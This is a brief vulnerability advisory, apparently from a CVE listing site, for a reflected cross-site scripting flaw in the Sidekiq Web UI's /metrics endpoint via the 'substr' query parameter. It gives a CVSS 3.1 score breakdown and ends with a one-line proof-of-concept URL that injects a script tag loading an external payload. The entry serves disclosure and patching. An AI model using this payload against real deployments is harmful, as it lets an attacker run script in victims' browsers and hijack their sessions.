CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
REQUIRED
Scope
UNCHANGED
Confidentiality Impact
LOW
Integrity Impact
LOW
Availability Impact
LOW
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:L
AI Score
Confidence
High
Reflected XSS in Sidekiq Web UI via the /metrics
HTTP end-point and the
substr
query param:
https://{host}/sidekiq/metrics?substr=foot%22%3E%3Cscript%20src=%22{payload}%22%20/%3E